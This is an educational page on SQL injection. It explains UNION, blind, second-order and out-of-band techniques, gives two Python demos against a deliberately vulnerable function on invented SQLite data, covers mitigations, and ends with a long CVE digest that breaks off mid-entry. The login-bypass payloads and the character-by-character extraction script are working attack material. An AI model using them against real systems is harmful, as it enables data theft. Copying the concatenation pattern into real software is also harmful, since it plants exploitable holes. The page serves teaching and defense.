SQL Injection

web HIGH

SQL injection exploits the way applications construct database queries by mixing user input directly into SQL statements.

How It Works

When developers concatenate untrusted data into queries without proper sanitization, attackers can inject SQL syntax that changes the query's logic. For example, entering ' OR '1'='1 as the username in a login form turns SELECT * FROM users WHERE username='<input>' into SELECT * FROM users WHERE username='' OR '1'='1', whose WHERE clause is true for every row, so the application matches a user (typically the first one in the table) without any valid credentials.

Attackers follow a methodical process: first probing input fields with special characters such as a single quote or semicolon and watching for database errors or changed behaviour that confirm the input reaches a query. Once confirmed, they escalate: UNION-based attacks append a second SELECT to read data from other tables, modifying statements alter records, and queries against information_schema (or the engine's equivalent catalog) map the database structure. Blind variants work without visible error messages: boolean-based attacks infer data one bit at a time by observing whether the application's response differs for a true versus a false condition, while time-based attacks call the database's sleep function (SLEEP() in MySQL, pg_sleep() in PostgreSQL, WAITFOR DELAY in SQL Server) so that a response delay confirms the condition.
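The UNION and boolean-blind steps above, as an added example that is not part of the original page. It runs against an in-memory SQLite database with constructed rows, through a hypothetical product-search function that concatenates its input; the schema, the search function and the hashes are all invented for the example. Time-based blind injection is not shown because SQLite has no sleep function.

```python
import sqlite3

# Constructed sample database for the demonstration; the rows, names and
# hashes are invented and are not taken from the original page.
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
INSERT INTO users VALUES (2, 'alice', 'e10adc3949ba59abbe56e057f20f883e');
INSERT INTO products VALUES (1, 'widget', 9.99);
INSERT INTO products VALUES (2, 'gadget', 19.99);
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_products_vulnerable(conn, term):
    """Hypothetical product search that concatenates the user's term into SQL.
    This is the injection point every function below drives."""
    sql = f"SELECT name, price FROM products WHERE name LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def union_dump_users(conn):
    """UNION-based attack: close the LIKE string, append a SELECT with the same
    number of columns (2) that reads the users table, and comment out the
    trailing %' the application appends. The 'xyz' prefix makes the original
    SELECT match nothing, so only the attacker's rows come back."""
    payload = "xyz' UNION SELECT username, password_hash FROM users --"
    return dict(search_products_vulnerable(conn, payload))


def oracle(conn, condition):
    """Boolean-based blind oracle. Nothing from `condition` is ever displayed;
    the page lists 'widget' when the condition is true and nothing when it
    is false, which leaks one bit per request."""
    payload = f"widget' AND ({condition}) --"
    return len(search_products_vulnerable(conn, payload)) > 0


def blind_extract(conn, query, max_len=64):
    """Recover the single-value result of `query` character by character.
    Each character is located by binary search over printable ASCII, so
    about seven requests per character instead of up to 95."""
    result = ""
    for pos in range(1, max_len + 1):
        if not oracle(conn, f"LENGTH(({query})) >= {pos}"):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"UNICODE(SUBSTR(({query}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    db = make_db()
    print("UNION dump:", union_dump_users(db))
    secret = "SELECT password_hash FROM users WHERE username = 'admin'"
    print("blind extraction:", blind_extract(db, secret))
```

The blind loop is what tools such as sqlmap automate; against a real target each oracle call is one HTTP request, and the request count (roughly eight per character here) is the signature a detection rule on the web or database side would look for.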

Advanced scenarios include second-order injection, where malicious input is stored safely by one code path and later concatenated into a query by a different one, and out-of-band attacks that exfiltrate data through DNS queries or HTTP requests initiated by the database server when direct data retrieval isn't possible. Some database systems let attackers reach the file system or the operating system through built-in features: MySQL's LOAD_FILE() reads files from the server's disk and SELECT ... INTO OUTFILE writes them (enough to drop a web shell under a document root if the account holds the FILE privilege), while SQL Server's xp_cmdshell runs operating system commands directly, escalating from database compromise to full server control.
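Second-order injection as an added example, not code from the original page. The registration path is parameterized and stores the hostile username admin'-- harmlessly; the password-change path later concatenates that stored value because it "came from the database". Both functions, the schema and the accounts are invented for the example and run on SQLite.

```python
import sqlite3

# Constructed sample data; the accounts are invented for this example.
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT);
INSERT INTO users VALUES (1, 'admin', 'original-admin-secret');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def register(conn, username, password):
    """First-order entry point, written correctly: the username is bound as a
    parameter, so admin'-- is stored verbatim and nothing happens yet."""
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)",
                 (username, password))


def change_password_vulnerable(conn, username, new_password):
    """Second-order sink: the username comes from the session/database rather
    than the request, so the developer assumed it was safe to concatenate."""
    sql = (f"UPDATE users SET password = '{new_password}' "
           f"WHERE username = '{username}'")
    conn.execute(sql)


def change_password_safe(conn, username, new_password):
    """Same operation with every value bound; where the value came from is irrelevant."""
    conn.execute("UPDATE users SET password = ? WHERE username = ?",
                 (new_password, username))


def password_of(conn, username):
    row = conn.execute("SELECT password FROM users WHERE username = ?",
                       (username,)).fetchone()
    return row[0] if row else None


def second_order_attack(conn, change_password):
    """Register a hostile username, then use the ordinary password-change
    feature on that account. Returns the admin account's password afterwards."""
    hostile = "admin'--"
    register(conn, hostile, "irrelevant")
    # The application later reloads the username from the database (for
    # example when building the session) and hands it to the sink.
    stored = conn.execute("SELECT username FROM users WHERE username = ?",
                          (hostile,)).fetchone()[0]
    # With the vulnerable sink the statement becomes
    #   UPDATE users SET password = '...' WHERE username = 'admin'--'
    # and the comment discards the closing quote, so admin is updated instead.
    change_password(conn, stored, "attacker-chosen")
    return password_of(conn, "admin")


if __name__ == "__main__":
    print("vulnerable sink, admin password:",
          second_order_attack(make_db(), change_password_vulnerable))
    print("safe sink, admin password:",
          second_order_attack(make_db(), change_password_safe))
```

The practical consequence is that validating or escaping only at the entry point is not enough; every statement that touches stored data has to bind its values, which is also the reason code review for this bug class searches for string building near execute() calls rather than near request parsing.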

Impact

  • Complete data breach — extraction of entire database contents including credentials, personal information, and proprietary data
  • Authentication bypass — logging in as any user without knowing passwords
  • Data manipulation — unauthorized modification or deletion of critical records
  • Privilege escalation — granting administrative rights to attacker-controlled accounts
  • Remote code execution — leveraging database features to run operating system commands and compromise the underlying server
  • Lateral movement — using compromised database credentials to access other connected systems

Real-World Examples

FreePBX's CVE-2025-66039 demonstrated a complete attack chain: SQL injection across 11 parameters in four different endpoints let attackers write rows into the cron_jobs table, and when the system's scheduler ran those rows their contents executed as operating system commands, granting full server control. The vulnerability required no authentication, so anyone who could reach the interface could exploit it immediately.

E-commerce platforms have suffered massive breaches through shopping cart SQL injection, where attackers inserted skimming code into stored procedures that executed during checkout, harvesting credit card data from thousands of transactions. Healthcare systems have been compromised through patient portal vulnerabilities, exposing millions of medical records when attackers injected UNION queries to merge data from supposedly isolated tables.

Mitigation

  • Parameterized queries (prepared statements) — send the SQL text and the data values to the database separately, so a value such as ' OR '1'='1 is compared as a literal string and can never change the query's structure. Only values can be bound: table and column names, ORDER BY columns and ASC/DESC (the order, sort and order_by parameters that recur in the CVE list below) must be mapped through an allowlist instead
  • Object-Relational Mapping (ORM) frameworks — generate parameterized SQL for ordinary operations, but raw-query and string-interpolation escape hatches inject exactly like hand-written SQL, and object query languages such as HQL are injectable too (see the TIM FLOW entry below)
  • Strict input validation — allowlist acceptable characters, formats and lengths and reject everything else; a defense-in-depth measure rather than a substitute for parameterization, since a name like O'Brien is legitimate input
  • Least privilege database accounts — give the application a role that can only read and write the tables it needs, with no FILE privilege, xp_cmdshell access or DDL rights, so an injection cannot escalate to file or operating system access
  • Web Application Firewall (WAF) — blocks common injection patterns as a secondary defense layer; encoding, comment and keyword variations bypass signature rules, so it is never sufficient on its own
  • Database activity monitoring — alerts on unusual query shapes from the application account (UNION, sleep functions, information_schema reads), error spikes, and privilege escalation attempts

Recent CVEs (4539)

CVE-2026-1133
EPSS 0% CVSS 7.3
HIGH This Week

SQL injection in Yonyou KSOA 9.0 allows unauthenticated remote attackers to manipulate the folderid parameter in /kmf/folder.jsp HTTP requests, potentially leading to unauthorized data access or modification. Public exploit code exists for this vulnerability, and the vendor has not provided a patch or response despite early notification.

SQLi Ksoa
NVD GitHub VulDB
CVE-2026-1132
EPSS 0% CVSS 7.3
HIGH This Week

SQL injection in Yonyou KSOA 9.0 via the folderid parameter in /kmf/edit_folder.jsp allows unauthenticated remote attackers to execute arbitrary database queries. Public exploit code exists for this vulnerability, and the vendor has not provided a patch despite early disclosure notification.

SQLi Ksoa
NVD GitHub VulDB
CVE-2026-1131
EPSS 0% CVSS 7.3
HIGH This Week

SQL injection in Yonyou KSOA 9.0's /kmc/save_catalog.jsp endpoint allows unauthenticated remote attackers to manipulate the catalogid parameter and execute arbitrary database queries. Public exploit code exists for this vulnerability, and no patch is currently available. The attack requires only network access with no user interaction, enabling potential data exfiltration and unauthorized database modification.

SQLi Ksoa
NVD GitHub VulDB
CVE-2026-1130
EPSS 0% CVSS 7.3
HIGH This Week

Unauthenticated SQL injection in Yonyou KSOA 9.0 via the ID parameter in the /worksheet/worksadd_plan.jsp endpoint allows remote attackers to execute arbitrary SQL queries and potentially access or modify sensitive data. Public exploit code exists for this vulnerability, and the vendor has not released a patch despite early notification. The attack requires no authentication or user interaction and can be exploited over the network.

SQLi Ksoa
NVD GitHub VulDB
CVE-2026-1129
EPSS 0% CVSS 7.3
HIGH This Week

SQL injection in Yonyou KSOA 9.0's /worksheet/worksadd.jsp endpoint allows unauthenticated remote attackers to manipulate the ID parameter and execute arbitrary database queries. Public exploit code exists for this vulnerability, and no patch is currently available from the vendor despite early notification. The attack requires no user interaction and could enable unauthorized data access, modification, or deletion.

SQLi Ksoa
NVD GitHub VulDB
CVE-2026-1124
EPSS 0% CVSS 7.3
HIGH This Week

SQL injection in Yonyou KSOA 9.0 allows unauthenticated remote attackers to manipulate the ID parameter in the /worksheet/work_report.jsp endpoint, potentially enabling unauthorized data access or modification. Public exploit code exists for this vulnerability, and the vendor has not provided a patch despite early notification.

SQLi Ksoa
NVD GitHub VulDB
CVE-2026-1123
EPSS 0% CVSS 7.3
HIGH This Week

SQL injection in Yonyou KSOA 9.0's /worksheet/work_mod.jsp endpoint allows unauthenticated remote attackers to manipulate the ID parameter and execute arbitrary database queries. Public exploit code exists for this vulnerability, and the vendor has not provided a patch or response to disclosure. The attack requires no user interaction and could enable unauthorized data access or modification.

SQLi Ksoa
NVD GitHub VulDB
CVE-2026-1122
EPSS 0% CVSS 7.3
HIGH This Week

Yonyou KSOA 9.0 contains a SQL injection vulnerability in the /worksheet/work_info.jsp endpoint via an unsanitized ID parameter, allowing unauthenticated remote attackers to execute arbitrary SQL queries. Public exploit code exists for this vulnerability, and the vendor has not provided a patch despite early notification. The attack requires no user interaction and can result in unauthorized data access, modification, or denial of service.

SQLi Ksoa
NVD GitHub VulDB
CVE-2026-1121
EPSS 0% CVSS 7.3
HIGH This Week

SQL injection in Yonyou KSOA 9.0's /worksheet/del_workplan.jsp endpoint allows unauthenticated remote attackers to manipulate the ID parameter and execute arbitrary database queries. Public exploit code exists for this vulnerability, and no patch is currently available from the vendor despite early disclosure notification.

SQLi Ksoa
NVD GitHub VulDB
CVE-2026-1120
EPSS 0% CVSS 7.3
HIGH This Week

SQL injection in Yonyou KSOA 9.0 allows unauthenticated remote attackers to manipulate the ID parameter in the /worksheet/del_work.jsp endpoint, potentially enabling unauthorized data access, modification, or deletion. Public exploit code exists for this vulnerability, and no patch is currently available from the vendor despite early disclosure notification.

SQLi Ksoa
NVD GitHub VulDB
CVE-2026-1119
EPSS 0% CVSS 7.3
HIGH POC This Week

Society Management System versions up to 1.0 contain a SQL injection vulnerability (CVSS 7.3).

PHP SQLi Society Management System
NVD GitHub VulDB
CVE-2026-1118
EPSS 0% CVSS 6.3
MEDIUM POC This Month

SQL injection in itsourcecode Society Management System 1.0 allows authenticated attackers to manipulate the Title parameter in /admin/add_activity.php, enabling remote data exfiltration, modification, or denial of service. Public exploit code exists for this vulnerability, and no patch is currently available.

PHP SQLi Society Management System
NVD GitHub VulDB
CVE-2026-1105
EPSS 0% CVSS 7.3
HIGH POC This Week

SQL injection in EasyCMS up to version 1.6 via the _order parameter in /UserAction.class.php allows unauthenticated remote attackers to manipulate database queries and potentially access or modify sensitive data. Public exploit code exists for this vulnerability, and no patch is currently available from the vendor despite early notification.

PHP SQLi Easycms
NVD GitHub VulDB
CVE-2026-1059
EPSS 0% CVSS 7.3
HIGH POC This Week

SQL injection in FeMiner Warehouse Management System's /src/chkuser.php endpoint allows unauthenticated remote attackers to manipulate the Username parameter and execute arbitrary database queries. Public exploit code exists for this vulnerability, and the vendor has not provided patches despite early notification. The flaw affects all versions up to commit 9cad1f1b179a98b9547fd003c23b07c7594775fa and enables attackers to potentially read, modify, or delete sensitive warehouse data.

PHP SQLi Warehouse Management System
NVD GitHub VulDB
CVE-2026-1050
EPSS 0% CVSS 7.3
HIGH This Week

SQL injection in the REST authentication endpoint of risesoft-y9 Digital-Infrastructure up to version 9.6.7 allows unauthenticated remote attackers to manipulate input parameters and execute arbitrary SQL queries. Public exploit code exists for this vulnerability, and the vendor has not yet released a patch despite early notification. The attack requires no user interaction and can compromise data confidentiality, integrity, and availability.

Java SQLi
NVD GitHub VulDB
CVE-2025-12984
EPSS 0% CVSS 4.9
MEDIUM This Month

The Advanced Ads - Ad Manager & AdSense plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter in all versions up to, and including, 2.0.15 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. [CVSS 4.9 MEDIUM]

WordPress SQLi PHP
NVD
CVE-2026-23723
EPSS 0% CVSS 7.2
HIGH POC PATCH This Week

SQL injection in WeGIA's Atendido_ocorrenciaControle endpoint allows authenticated attackers to manipulate the id_memorando parameter and extract entire databases, exposing sensitive personal information and potentially reading arbitrary files on misconfigured systems. Public exploit code exists for this vulnerability affecting WeGIA versions prior to 3.6.2. A patch is available in version 3.6.2 and should be deployed immediately to affected charitable institution management systems.

SQLi Wegia
NVD GitHub
CVE-2021-47811
EPSS 0% CVSS 9.1
CRITICAL POC Act Now

Grocery Crud 1.6.4 has a SQL injection vulnerability in the order_by parameter, allowing remote attackers to read, modify, or delete database contents through crafted sort requests.

SQLi Grocery Crud
NVD Exploit-DB
CVE-2021-47801
EPSS 0% CVSS 8.2
HIGH POC This Week

Vianeos OctoPUS 5 contains a time-based blind SQL injection vulnerability in the 'login_user' parameter during authentication requests. [CVSS 8.2 HIGH]

SQLi
NVD Exploit-DB
CVE-2021-47782
EPSS 0% CVSS 8.2
HIGH POC This Week

Odine Solutions GateKeeper 1.0 contains a SQL injection vulnerability in the trafficCycle API endpoint that allows remote attackers to inject malicious database queries. [CVSS 8.2 HIGH]

PostgreSQL SQLi
NVD Exploit-DB
CVE-2025-70893
EPSS 0% CVSS 8.8
HIGH POC This Week

A time-based blind SQL Injection vulnerability exists in PHPGurukul Cyber Cafe Management System v1.0 within the adminprofile.php endpoint. [CVSS 8.8 HIGH]

PHP SQLi Cyber Cafe Management System
NVD GitHub
CVE-2025-70892
EPSS 0% CVSS 9.8
CRITICAL POC Act Now

Phpgurukul Cyber Cafe Management System v1.0 has SQL injection in the username parameter of add-users.php. PoC available.

PHP SQLi Cyber Cafe Management System
NVD GitHub
CVE-2025-66417
EPSS 0% CVSS 7.5
HIGH This Week

GLPI is a free asset and IT management software package. From 11.0.0, < 11.0.3, an unauthenticated user can perform a SQL injection through the inventory endpoint. [CVSS 7.5 HIGH]

SQLi Glpi
NVD GitHub
CVE-2021-47777
EPSS 0% CVSS 8.2
HIGH POC This Week

Build Smart ERP 21.0817 contains an unauthenticated SQL injection vulnerability in the 'eidValue' parameter of the login validation endpoint. [CVSS 8.2 HIGH]

SQLi
NVD Exploit-DB
CVE-2021-47766
EPSS 0% CVSS 7.1
HIGH POC This Week

Kmaleon 1.1.0.205 contains an authenticated SQL injection vulnerability in the 'tipocomb' parameter of kmaleonW.php that allows attackers to manipulate database queries. [CVSS 7.1 HIGH]

PHP SQLi
NVD Exploit-DB
CVE-2021-47763
EPSS 0% CVSS 8.2
HIGH POC This Week

Aimeos 2021.10 LTS contains a SQL injection vulnerability in the json api 'sort' parameter that allows attackers to inject malicious database queries. Attackers can manipulate the sort parameter to reveal table and column names by sending crafted GET requests to the jsonapi/review endpoint. [CVSS 8.2 HIGH]

SQLi
NVD Exploit-DB
CVE-2025-67082
EPSS 0% CVSS 6.5
MEDIUM POC This Month

An SQL injection vulnerability in InvoicePlane through 1.6.3 has been identified in "maxQuantity" and "minQuantity" parameters when generating a report. An authenticated attacker can exploit this issue via error-based SQL injection, allowing for the extraction of arbitrary data from the database. [CVSS 6.5 MEDIUM]

SQLi Invoiceplane
NVD GitHub
CVE-2025-67081
EPSS 0% CVSS 4.9
MEDIUM This Month

An SQL injection vulnerability in Itflow through 25.06 has been identified in the "role_id" parameter when editing a profile. An attacker with admin account can exploit this issue via blind SQL injection, allowing for the extraction of arbitrary data from the database. [CVSS 4.9 MEDIUM]

SQLi Itflow
NVD GitHub
CVE-2025-12166
EPSS 0% CVSS 7.5
HIGH This Week

The Appointment Booking Calendar - Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to blind SQL Injection via the `order` and `append_where_sql` parameters in all versions up to, and including, 1.6.9.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. [CVSS 7.5 HIGH]

WordPress SQLi PHP
NVD
CVE-2026-23492
EPSS 0% CVSS 8.8
HIGH POC PATCH This Week

Blind SQL injection in Pimcore's Admin Search Find API allows authenticated attackers to extract database information through inferential techniques, bypassing the incomplete mitigation from a prior patch that only removed comment-based attacks. The vulnerability affects Pimcore versions prior to 12.3.1 and 11.5.14, with public exploit code available. Patched versions are available and should be deployed immediately.

SQLi Information Disclosure Pimcore
NVD GitHub
CVE-2025-37183
EPSS 0% CVSS 7.2
HIGH This Week

Vulnerabilities in the web-based management interface of EdgeConnect SD-WAN Orchestrator could allow an authenticated remote attacker to perform SQL injection attacks. [CVSS 7.2 HIGH]

SQLi Edgeconnect Sd Wan Orchestrator
NVD
CVE-2025-37182
EPSS 0% CVSS 7.2
HIGH This Week

Vulnerabilities in the web-based management interface of EdgeConnect SD-WAN Orchestrator could allow an authenticated remote attacker to perform SQL injection attacks. [CVSS 7.2 HIGH]

SQLi Edgeconnect Sd Wan Orchestrator
NVD
CVE-2025-37181
EPSS 0% CVSS 7.2
HIGH This Week

Vulnerabilities in the web-based management interface of EdgeConnect SD-WAN Orchestrator could allow an authenticated remote attacker to perform SQL injection attacks. [CVSS 7.2 HIGH]

SQLi Edgeconnect Sd Wan Orchestrator
NVD
CVE-2025-14770
EPSS 0% CVSS 7.5
HIGH This Week

The Shipping Rate By Cities plugin for WordPress is vulnerable to SQL Injection via the 'city' parameter in all versions up to, and including, 2.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. [CVSS 7.5 HIGH]

WordPress SQLi PHP
NVD
CVE-2026-0678
EPSS 0% CVSS 4.9
MEDIUM This Month

The Flat Shipping Rate by City for WooCommerce WordPress plugin is affected by SQL injection (CVSS 4.9).

WordPress SQLi
NVD
CVE-2025-14615
EPSS 0% CVSS 7.1
HIGH This Week

The DASHBOARD BUILDER - WordPress plugin for Charts and Graphs plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5.7. This is due to missing nonce validation on the settings handler in dashboardbuilder-admin.php. [CVSS 7.1 HIGH]

WordPress PHP SQLi +1
NVD
CVE-2023-54340
EPSS 0% CVSS 8.2
HIGH POC This Week

WorkOrder CMS 0.1.0 contains a SQL injection vulnerability that allows unauthenticated attackers to bypass login by manipulating username and password parameters. [CVSS 8.2 HIGH]

SQLi
NVD GitHub Exploit-DB
CVE-2023-54333
EPSS 0% CVSS 8.2
HIGH POC This Week

Social-Share-Buttons 2.2.3 contains a critical SQL injection vulnerability in the project_id parameter that allows attackers to manipulate database queries. [CVSS 8.2 HIGH]

SQLi
NVD GitHub Exploit-DB
CVE-2022-50895
EPSS 0% CVSS 9.8
CRITICAL POC Act Now

Aero CMS 0.0.1 has SQL injection in the author parameter exploitable through boolean-based, error-based, time-based, and UNION query techniques. PoC available.

SQLi Aerocms
NVD GitHub Exploit-DB
CVE-2022-50894
EPSS 0% CVSS 6.5
MEDIUM POC This Month

VIAVIWEB Wallpaper Admin 1.0 contains an SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the img_id parameter. [CVSS 6.5 MEDIUM]

PHP SQLi Wallpaper Admin
NVD Exploit-DB
CVE-2022-50892
EPSS 0% CVSS 8.2
HIGH POC This Week

VIAVIWEB Wallpaper Admin 1.0 contains a SQL injection vulnerability that allows attackers to bypass authentication by manipulating login credentials. Attackers can exploit the login page by injecting 'admin' or 1=1-- - payload to gain unauthorized access to the administrative interface. [CVSS 8.2 HIGH]

SQLi Authentication Bypass Wallpaper Admin
NVD Exploit-DB
CVE-2022-50805
EPSS 0% CVSS 8.2
HIGH POC This Week

Senayan Library Management System 9.0.0 contains a SQL injection vulnerability in the 'class' parameter that allows attackers to inject malicious SQL queries. [CVSS 8.2 HIGH]

SQLi
NVD GitHub Exploit-DB
CVE-2026-20947
EPSS 0% CVSS 8.8
HIGH This Week

SQL injection in Microsoft SharePoint Server enables authenticated attackers to execute arbitrary code remotely through improper sanitization of database queries. This vulnerability affects authorized users with network access and could allow them to compromise affected systems with high-level privileges. No patch is currently available for this issue.

Microsoft SQLi Sharepoint Server
NVD
CVE-2025-59922
EPSS 0% CVSS 7.2
HIGH This Week

An improper neutralization of special elements used in an SQL command ('SQL Injection') vulnerability [CWE-89] in Fortinet FortiClientEMS 7.4.3 through 7.4.4, 7.4.0 through 7.4.1, 7.2.0 through 7.2.10, and all 7.0 versions may allow an authenticated attacker with at least read-only admin permission to execute unauthorized SQL code or commands via crafted HTTP or HTTPS requests. [CVSS 7.2 HIGH]

Fortinet SQLi Forticlientems
NVD
CVE-2025-69991
EPSS 0% CVSS 9.8
CRITICAL POC Act Now

phpgurukul News Portal V4.1 has SQL injection in check_availablity.php. PoC available.

PHP SQLi News Portal
NVD GitHub
CVE-2025-13774
EPSS 0% CVSS 8.8
HIGH This Week

Progress Flowmon ADS versions prior to 12.5.4 and 13.0.1 contain a SQL injection vulnerability that allows authenticated users to execute unintended SQL queries and commands. [CVSS 8.8 HIGH]

SQLi Flowmon Anomaly Detection System
NVD
CVE-2025-67146
EPSS 0% CVSS 9.4
CRITICAL POC Act Now

GYM-MANAGEMENT-SYSTEM 1.0 has multiple SQL injection vulnerabilities in search and payment endpoints (member_search, trainer_search, gym_search, payment_search). PoC available.

PHP SQLi Authentication Bypass +1
NVD GitHub
CVE-2025-67147
EPSS 0% CVSS 9.8
CRITICAL Act Now

Gym Management System PHP 1.0 has multiple SQL injection vulnerabilities across three files (submit_contact.php, secure_login.php, change_s_pwd.php) through seven parameters. Authentication bypass and data extraction possible.

PHP SQLi Authentication Bypass
NVD GitHub
CVE-2025-51567
EPSS 0% CVSS 9.1
CRITICAL POC Act Now

Kashipara Online Exam System V1.0 has SQL injection in profile.php through five POST parameters (rname, rcollage, rnumber, rgender, rpassword). PoC available.

PHP SQLi Online Exam System
NVD GitHub
CVE-2025-41006
EPSS 0%
This Week

Imaster's MEMS Events CRM contains an SQL injection vulnerability in ‘phone’ parameter in ‘/memsdemo/login.php’.

PHP SQLi
NVD
CVE-2025-41005
EPSS 0%
This Week

Imaster's MEMS Events CRM contains an SQL injection vulnerability in the ‘keyword’ parameter in ‘/memsdemo/exchange_offers.php’.

PHP SQLi
NVD
CVE-2025-41004
EPSS 0%
This Week

Imaster's Patient Records Management System is vulnerable to SQL Injection in the endpoint ‘/projects/hospital/admin/complaints.php’ through the ‘id’ parameter.

PHP SQLi
NVD
CVE-2025-52694
EPSS 13% CVSS 10.0
CRITICAL Act Now

Critical SQL injection vulnerability in an internet-exposed service enabling unauthenticated extraction and manipulation of the entire database. CVSS 10.0 with scope change; its EPSS score of 12.9% is far above the near-zero scores of the other entries on this page, indicating a comparatively high predicted probability of exploitation in the wild.

SQLi Iotsuite Starter Linux Docker Iot Edge Windows +3
NVD
CVE-2026-0852
EPSS 0% CVSS 7.3
HIGH POC This Week

SQL injection in Online Music Site 1.0's AdminUpdateUser.php allows unauthenticated remote attackers to manipulate the ID parameter and execute arbitrary database queries. Public exploit code exists for this vulnerability, and no patch is currently available. Successful exploitation could enable unauthorized data access, modification, or deletion with confidentiality, integrity, and availability impact.

PHP SQLi Online Music Site
NVD GitHub VulDB
CVE-2026-0851
EPSS 0% CVSS 7.3
HIGH POC This Week

SQL injection in code-projects Online Music Site 1.0 via the txtusername parameter in AdminAddUser.php enables unauthenticated remote attackers to manipulate database queries and potentially access or modify sensitive data. Public exploit code exists for this vulnerability, increasing the risk of active exploitation. No patch is currently available.

PHP SQLi Online Music Site
NVD GitHub VulDB
CVE-2026-0850
EPSS 0% CVSS 4.7
MEDIUM POC This Month

Intern Membership Management System versions up to 1.0 contain a SQL injection vulnerability (CVSS 4.7).

PHP SQLi Intern Membership Management System
NVD GitHub VulDB
CVE-2026-0843
EPSS 0% CVSS 6.3
MEDIUM This Month

SQL injection in jjjfood and jjjshop_food PHP applications through the latitude parameter in /index.php/api/product.category/index allows authenticated attackers to execute arbitrary database queries remotely. Public exploit code exists for this vulnerability, and the vendor has not provided a patch despite notification. Affected installations up to version 20260103 should implement immediate mitigation measures.

PHP SQLi
NVD VulDB
CVE-2026-22687
EPSS 0% CVSS 5.6
MEDIUM POC PATCH This Month

WeKnora versions before 0.2.5 allow unauthenticated attackers to bypass database query restrictions through prompt injection techniques when the Agent service is enabled, enabling unauthorized access to sensitive data. Public exploit code exists for this vulnerability, which affects the framework's document understanding and semantic retrieval capabilities. A patch is available in version 0.2.5 and later.

SQLi AI / ML Weknora +1
NVD GitHub
CVE-2025-65091
EPSS 0% CVSS 10.0
CRITICAL PATCH Act Now

XWiki Full Calendar Macro (before 2.4.5) has SQL injection accessible to guest users via the Calendar.JSONService page. Maximum CVSS 10.0 with scope change. Patch available.

SQLi Denial Of Service Full Calendar Macro
NVD GitHub
CVE-2025-51626
EPSS 0% CVSS 6.5
MEDIUM This Month

SQL injection vulnerability in pss.sale.com 1.0 via the id parameter to the userfiles/php/cancel_order.php endpoint. [CVSS 6.5 MEDIUM]

PHP SQLi Pss.Sale.Com
NVD GitHub
CVE-2025-67811
EPSS 0% CVSS 6.5
MEDIUM This Month

Area9 Rhapsode 1.47.3 allows SQL Injection via multiple API endpoints accessible to authenticated users. Insufficient input validation allows remote attackers to inject arbitrary SQL commands, resulting in unauthorized database access and potential compromise of sensitive data. [CVSS 6.5 MEDIUM]

SQLi Rhapsode
NVD
CVE-2026-22197
EPSS 0% CVSS 8.1
HIGH This Week

GestSup versions before 3.2.60 allow authenticated attackers to execute SQL injection attacks through insufficiently sanitized filtering and sorting parameters in the asset list functionality, potentially enabling unauthorized database access or modification. The vulnerability requires valid credentials to exploit but has no available patch, leaving affected installations vulnerable to data breach or manipulation depending on database permissions.

SQLi Gestsup
NVD
CVE-2026-22196
EPSS 0% CVSS 8.1
HIGH This Week

GestSup prior to version 3.2.60 is vulnerable to SQL injection in the ticket creation feature, allowing authenticated attackers to execute arbitrary database queries through unsanitized user input. An attacker with valid credentials can read or modify sensitive database contents depending on the database permission level. No patch is currently available.

SQLi Gestsup
NVD
CVE-2026-22195
EPSS 0% CVSS 8.1
HIGH This Week

Authenticated attackers can exploit SQL injection in GestSup's search functionality (versions before 3.2.60) to manipulate database queries and access or modify sensitive data. The vulnerability stems from insufficient input validation on user-controlled search parameters in SQL statements. With no patch currently available, affected organizations should implement database access controls and monitor for suspicious search activity.

SQLi Gestsup
NVD
CVE-2025-15496
EPSS 0% CVSS 6.3
MEDIUM POC This Month

A vulnerability was determined in guchengwuyue yshopmall up to 1.9.1. Affected is the function getPage of the file /api/jobs. [CVSS 6.3 MEDIUM]

SQLi Yshopmall
NVD GitHub VulDB
CVE-2025-15494
EPSS 0% CVSS 6.3
MEDIUM POC This Month

A vulnerability has been found in RainyGao DocSys up to 2.02.37. This affects an unknown function of the file com/DocSystem/mapping/UserMapper.xml. [CVSS 6.3 MEDIUM]

SQLi Docsys
NVD GitHub VulDB
CVE-2025-15493
EPSS 0% CVSS 6.3
MEDIUM POC This Month

DocSys versions up to 2.02.36 contain a SQL injection vulnerability (CVSS 6.3).

SQLi Docsys
NVD GitHub VulDB
CVE-2026-0803
EPSS 0% CVSS 6.3
MEDIUM POC This Month

PHPGurukul Online Course Registration System through version 3.1 contains a SQL injection vulnerability in /enroll.php that allows authenticated attackers to manipulate multiple parameters (studentregno, Pincode, session, department, level, course, sem) to execute arbitrary database queries over the network. Public exploit code exists for this vulnerability, and no patch is currently available, creating risk for deployments handling course enrollment data.

PHP SQLi Online Course Registration System
NVD VulDB
CVE-2025-67281
EPSS 0% CVSS 5.4
MEDIUM This Month

TIM BPM Suite / TIM FLOW through 9.1.2 contains multiple SQL injection vulnerabilities that allow a low-privileged user and an administrative user to access the database and its content. [CVSS 5.4 MEDIUM]

SQLi Tim Flow
NVD
CVE-2025-67280
EPSS 0% CVSS 5.4
MEDIUM This Month

In TIM BPM Suite/ TIM FLOW through 9.1.2 multiple Hibernate Query Language injection vulnerabilities exist which allow a low privileged user to extract passwords of other users and access sensitive data of another user. [CVSS 5.4 MEDIUM]

Information Disclosure SQLi Tim Flow
NVD
CVE-2025-15492
EPSS 0% CVSS 6.3
MEDIUM POC This Month

